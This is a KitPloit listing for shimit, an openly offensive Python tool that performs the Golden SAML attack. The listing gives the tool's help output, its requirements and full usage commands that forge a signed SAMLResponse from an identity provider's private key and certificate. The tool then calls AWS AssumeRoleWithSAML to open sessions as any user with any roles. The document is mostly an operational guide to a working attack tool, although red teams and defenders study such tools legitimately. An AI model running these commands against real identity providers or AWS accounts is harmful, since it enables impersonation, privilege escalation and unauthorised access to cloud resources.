shimit - A tool that implements the Golden SAML attack

2018-01-06T20:45:30
ID KITPLOIT:3969207346105972899
Type kitploit
Reporter KitPloit
Modified 2018-01-06T20:45:30

Description

shimit is a python tool that implements the Golden SAML attack. More informations on this can be found in the following article on our blog.

python .\shimit.py -h
usage: shimit.py [-h] -pk KEY [-c CERT] [-sp SP] -idp IDP -u USER [-reg REGION]
                 [--SessionValidity SESSION_VALIDITY] [--SamlValidity SAML_VALIDITY] -n SESSION_NAME
                 -r ROLES -id ARN [-o OUT_FILE] [-l LOAD_FILE] [-t TIME]

              ██╗   ███████╗██╗  ██╗██╗███╗   ███╗██╗████████╗     ██╗ ██╗  
             ██╔╝   ██╔════╝██║  ██║██║████╗ ████║██║╚══██╔══╝    ██╔╝ ╚██╗ 
            ██╔╝    ███████╗███████║██║██╔████╔██║██║   ██║      ██╔╝   ╚██╗
            ╚██╗    ╚════██║██╔══██║██║██║╚██╔╝██║██║   ██║     ██╔╝    ██╔╝
             ╚██╗   ███████║██║  ██║██║██║ ╚═╝ ██║██║   ██║    ██╔╝    ██╔╝ 
              ╚═╝   ╚══════╝╚═╝  ╚═╝╚═╝╚═╝     ╚═╝╚═╝   ╚═╝    ╚═╝     ╚═╝

Overview
In a golden SAML attack, attackers can gain access to an application (any application that supports SAML authentication) with any privileges they desire and be any user on the targeted application.
_ shimit _ allows the user to create a signed _ SAMLResponse _ object, and use it to open a session in the Service Provider. _ shimit _ now supports AWS Console as a _ Service Provider _ , more are in the works...

AWS
After generating and signing the _ SAMLResponse _ 's _ assertion _ , shimit will call the _ AssumeRoleWithSAML() _ API in AWS. Then, the session token and key will be applied to a new session, where the user can use aws cli to perform action using the permissions obtained using the _ golden SAML _ .

Requirements:
For installing the required modules, run the following command:

python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml

AWS cli
Needs to be installed in order to use the credentials obtained. Can be downloaded for Windows or Linux from these links.

Usage:

Apply session for AWS cli

python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n [email protected] -r ADFS-admin -r ADFS-monitor -id 123456789012

idp - Identity Provider URL e.g. http://server.domain.com/adfs/services/trust
pk - Private key file full path (pem format)
c - Certificate file full path (pem format)
u - User and domain name e.g. domain\username (use \ or quotes in nix)
n - Session name in AWS
r - Desired roles in AWS. Supports Multiple roles, the first one specified will be assumed.
id * - AWS account id e.g. 123456789012

Save SAMLResponse to file

python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n [email protected] -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml

o - Output encoded SAMLResponse to a specified file path

Load SAMLResponse from file

python .\shimit.py -l saml_response.xml

l - Load SAMLResponse from a specified file path

Contributions
shimit supports AWS as a service provider at the moment, as a POC. We highly encourage you to conribute with a new modules for other service providers.

Download shimit